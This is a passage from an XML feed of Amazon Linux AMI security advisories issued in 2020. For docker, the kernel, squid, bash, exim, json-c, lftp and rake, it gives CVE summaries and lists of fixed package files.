</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13401" title="" id="CVE-2020-13401" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker" version="19.03.6ce" release="4.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-19.03.6ce-4.58.amzn1.x86_64.rpm</filename></package><package name="docker-debuginfo" version="19.03.6ce" release="4.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-19.03.6ce-4.58.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1377</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1377: important priority package update for kernel</title><issued date="2020-06-01 12:24:00" /><updated date="2020-06-03 17:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1749:
A flaw was found in the Linux kernel's implementation of some networking protocols in IPsec, such as VXLAN and GENEVE tunnels over IPv6. When an encrypted tunnel is created between two hosts, the kernel isn't correctly routing tunneled data over the encrypted link; rather sending the data unencrypted. This would allow anyone in between the two endpoints to read the traffic unencrypted. The main threat from this vulnerability is to data confidentiality.
1809833: CVE-2020-1749 kernel: some ipv6 protocols not encrypted over ipsec tunnel.
CVE-2020-12770:
An issue was discovered in the Linux kernel through 5.6.11. sg_write lacks an sg_remove_request call in a certain failure case, aka CID-83c6f2390040.
1834845: CVE-2020-12770 kernel: sg_write function lacks an sg_remove_request call in a certain failure case
CVE-2020-10751:
A flaw was found in the Linux kernels SELinux LSM hook implementation before version 5.7, where it incorrectly assumed that an skb would only contain a single netlink message. The hook would incorrectly only validate the first netlink message in the skb and allow or deny the rest of the messages within the skb with the granted permission without further processing.
1839634: CVE-2020-10751 kernel: SELinux netlink permission check bypass
CVE-2019-19768:
In the Linux kernel 5.4.0-rc2, there is a use-after-free (read) in the __blk_add_trace function in kernel/trace/blktrace.c (which is used to fill out a blk_io_trace structure and place it in a per-cpu sub-buffer).
1786164: CVE-2019-19768 kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c
CVE-2019-19319:
In the Linux kernel 5.0.21, a setxattr operation, after a mount of a crafted ext4 image, can cause a slab-out-of-bounds write access because of an ext4_xattr_set_entry use-after-free in fs/ext4/xattr.c when a large old_size value is used in a memset call.
1784130: CVE-2019-19319 kernel: out-of-bounds write in ext4_xattr_set_entry in fs/ext4/xattr.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19319" title="" id="CVE-2019-19319" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19768" title="" id="CVE-2019-19768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10751" title="" id="CVE-2020-10751" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12770" title="" id="CVE-2020-12770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1749" title="" id="CVE-2020-1749" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.181" release="108.257.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.181-108.257.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.181-108.257.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.181" release="108.257.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.181-108.257.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1378</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1378: important priority package update for squid</title><issued date="2020-06-01 12:25:00" /><updated date="2020-06-03 17:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11945:
An issue was discovered in Squid before 5.0.2. A remote attacker can replay a sniffed Digest Authentication nonce to gain access to resources that are otherwise forbidden. This occurs because the attacker can overflow the nonce reference counter (a short integer). Remote code execution may occur if the pooled token credentials are freed (instead of replayed as valid credentials).
1827563: CVE-2020-11945 squid: improper access restriction upon Digest Authentication nonce replay could lead to remote code execution
CVE-2019-12525:
An issue was discovered in Squid 3.3.9 through 3.5.28 and 4.x through 4.7. When Squid is configured to use Digest authentication, it parses the header Proxy-Authorization. It searches for certain tokens such as domain, uri, and qop. Squid checks if this token's value starts with a quote and ends with one. If so, it performs a memcpy of its length minus 2. Squid never checks whether the value is just a single quote (which would satisfy its requirements), leading to a memcpy of its length minus 1.
1730535: CVE-2019-12525 squid: parsing of header Proxy-Authentication leads to memory corruption
CVE-2019-12521:
An issue was discovered in Squid through 4.7. When Squid is parsing ESI, it keeps the ESI elements in ESIContext. ESIContext contains a buffer for holding a stack of ESIElements. When a new ESIElement is parsed, it is added via addStackElement. addStackElement has a check for the number of elements in this buffer, but it's off by 1, leading to a Heap Overflow of 1 element. The overflow is within the same structure so it can't affect adjacent memory blocks, and thus just leads to a crash while processing.
1827562: CVE-2019-12521 squid: off-by-one error in addStackElement allows for a heap buffer overflow and a crash
CVE-2019-12519:
An issue was discovered in Squid through 4.7. When handling the tag esi:when when ESI is enabled, Squid calls ESIExpression::Evaluate. This function uses a fixed stack buffer to hold the expression while it's being evaluated. When processing the expression, it could either evaluate the top of the stack, or add a new member to the stack. When adding a new member, there is no check to ensure that the stack won't overflow.
1827552: CVE-2019-12519 squid: improper check for new member in ESIExpression::Evaluate allows for stack buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12519" title="" id="CVE-2019-12519" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12521" title="" id="CVE-2019-12521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12525" title="" id="CVE-2019-12525" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11945" title="" id="CVE-2020-11945" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-15.39.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="15.39.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-15.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1379</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1379: medium priority package update for bash</title><issued date="2020-06-23 05:55:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9924:
rbash in Bash before 4.4-beta2 did not prevent the shell user from modifying BASH_CMDS, thus allowing the user to execute any command with the permissions of the shell.
1691774: CVE-2019-9924 bash: BASH_CMD is writable in restricted bash shells
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9924" title="" id="CVE-2019-9924" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bash" version="4.2.46" release="34.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-4.2.46-34.43.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.2.46" release="34.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-debuginfo-4.2.46-34.43.amzn1.x86_64.rpm</filename></package><package name="bash-doc" version="4.2.46" release="34.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/bash-doc-4.2.46-34.43.amzn1.x86_64.rpm</filename></package><package name="bash-debuginfo" version="4.2.46" release="34.43.amzn1" epoch="0" arch="i686"><filename>Packages/bash-debuginfo-4.2.46-34.43.amzn1.i686.rpm</filename></package><package name="bash-doc" version="4.2.46" release="34.43.amzn1" epoch="0" arch="i686"><filename>Packages/bash-doc-4.2.46-34.43.amzn1.i686.rpm</filename></package><package name="bash" version="4.2.46" release="34.43.amzn1" epoch="0" arch="i686"><filename>Packages/bash-4.2.46-34.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1380</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1380: important priority package update for exim</title><issued date="2020-06-23 05:57:00" /><updated date="2020-06-26 04:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12783:
Exim through 4.93 has an out-of-bounds read in the SPA authenticator that could result in SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c.
1836362: CVE-2020-12783 exim: out-of-bounds read in the SPA authenticator can lead to SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12783" title="" id="CVE-2020-12783" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.26.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.26.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1381</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1381: medium priority package update for json-c</title><issued date="2020-06-23 05:59:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12762:
json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend.
1835253: CVE-2020-12762 json-c: integer overflow and out-of-bounds write via a large JSON file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12762" title="" id="CVE-2020-12762" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="json-c-debuginfo" version="0.11" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-debuginfo-0.11-7.8.amzn1.x86_64.rpm</filename></package><package name="json-c-doc" version="0.11" release="7.8.amzn1" epoch="0" arch="noarch"><filename>Packages/json-c-doc-0.11-7.8.amzn1.noarch.rpm</filename></package><package name="json-c" version="0.11" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-0.11-7.8.amzn1.x86_64.rpm</filename></package><package name="json-c-devel" version="0.11" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/json-c-devel-0.11-7.8.amzn1.x86_64.rpm</filename></package><package name="json-c-debuginfo" version="0.11" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-debuginfo-0.11-7.8.amzn1.i686.rpm</filename></package><package name="json-c" version="0.11" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-0.11-7.8.amzn1.i686.rpm</filename></package><package name="json-c-devel" version="0.11" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/json-c-devel-0.11-7.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1382</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1382: important priority package update for kernel</title><issued date="2020-06-23 06:02:00" /><updated date="2020-07-15 17:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12826:
A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.
1822077: CVE-2020-12826 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process
CVE-2020-12657:
An issue was discovered in the Linux kernel before 5.6.5. There is a use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body.
1832866: CVE-2020-12657 kernel: use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body
CVE-2020-10711:
A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the' ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference issue while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service.
99999:
1825116: CVE-2020-10711 Kernel: NetLabel: null pointer dereference while receiving CIPSO packet with null category may cause kernel panic
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10711" title="" id="CVE-2020-10711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12657" title="" id="CVE-2020-12657" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12826" title="" id="CVE-2020-12826" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1383</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1383: medium priority package update for lftp</title><issued date="2020-06-23 06:03:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-10916:
It has been discovered that lftp up to and including version 4.8.3 does not properly sanitize remote file names, leading to a loss of integrity on the local system when reverse mirroring is used. A remote attacker may trick a user to use reverse mirroring on an attacker controlled FTP server, resulting in the removal of all files in the current working directory of the victim's system.
1610349: CVE-2018-10916 lftp: particular remote file names may lead to current working directory erased
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10916" title="" id="CVE-2018-10916" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lftp" version="4.4.8" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/lftp-4.4.8-12.30.amzn1.x86_64.rpm</filename></package><package name="lftp-scripts" version="4.4.8" release="12.30.amzn1" epoch="0" arch="noarch"><filename>Packages/lftp-scripts-4.4.8-12.30.amzn1.noarch.rpm</filename></package><package name="lftp-debuginfo" version="4.4.8" release="12.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/lftp-debuginfo-4.4.8-12.30.amzn1.x86_64.rpm</filename></package><package name="lftp" version="4.4.8" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/lftp-4.4.8-12.30.amzn1.i686.rpm</filename></package><package name="lftp-debuginfo" version="4.4.8" release="12.30.amzn1" epoch="0" arch="i686"><filename>Packages/lftp-debuginfo-4.4.8-12.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1384</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1384: medium priority package update for rubygem-rake</title><issued date="2020-06-23 06:05:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8130:
There is an OS command injection vulnerability in Ruby Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|`.
1816270: CVE-2020-8130 rake: OS Command Injection via egrep in Rake::FileList
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130" title="" id="CVE-2020-8130" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem21-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem21-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem20-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem20-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem23-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem21-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem21-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem22-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem22-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem23-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem22-rake" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem22-rake-10.4.2-1.48.amzn1.noarch.rpm</filename></package><package name="rubygem20-rake-doc" version="10.4.2" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem20-rake-doc-10.4.2-1.48.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1385</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1385: medium priority package update for rubygem24-rake</title><issued date="2020-06-23 06:06:00" /><updated date="2020-06-26 04:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8130:
There is an OS command injection vulnerability in Ruby Rake < 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|`.
1816270: CVE-2020-8130 rake: OS Command Injection via egrep in Rake::FileList
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8130" title="" id="CVE-2020-8130" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem24-rake-doc" version="12.0.0" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rake-doc-12.0.0-1.49.amzn1.noarch.rpm</filename></package><package name="rubygem24-rake" version="12.0.0" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rake-12.0.0-1.49.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1386</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1386: important priority package update for squid</title><issued date="2020-06-23 06:08:00" /><updated date="2020-07-15 17:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11945:
An issue was discovered in Squid before 5.0.2. A remote attacker can replay a sniffed Digest Authentication nonce to gain access to resources that are otherwise forbidden. This occurs because the attacker can overflow the nonce reference counter (a short integer). Remote code execution may occur if the pooled token credentials are freed (instead of replayed as valid credentials).
1827563: CVE-2020-11945 squid: improper access restriction upon Digest Authentication nonce replay could lead to remote code execution
CVE-2019-13345:
The cachemgr.cgi web module of Squid through 4.7 has XSS via the user_name or auth parameter.
1727744: CVE-2019-13345 squid: XSS via user_name or auth parameter in cachemgr.cgi
CVE-2019-12525:
An issue was discovered in Squid 3.3.9 through 3.5.28 and 4.x through 4.7. When Squid is configured to use Digest authentication, it parses the header Proxy-Authorization. It searches for certain tokens such as domain, uri, and qop. Squid checks if this token's value starts with a quote and ends with one. If so, it performs a memcpy of its length minus 2. Squid never checks whether the value is just a single quote (which would satisfy its requirements), leading to a memcpy of its length minus 1.
1730535: CVE-2019-12525 squid: parsing of header Proxy-Authentication leads to memory corruption
CVE-2019-12519:
An issue was discovered in Squid through 4.7. When handling the tag esi:when when ESI is enabled, Squid calls ESIExpression::Evaluate. This function uses a fixed stack buffer to hold the expression while it's being evaluated. When processing the expression, it could either evaluate the top of the stack, or add a new member to the stack. When adding a new member, there is no check to ensure that the stack won't overflow.
1827552: CVE-2019-12519 squid: improper check for new member in ESIExpression::Evaluate allows for stack buffer overflow
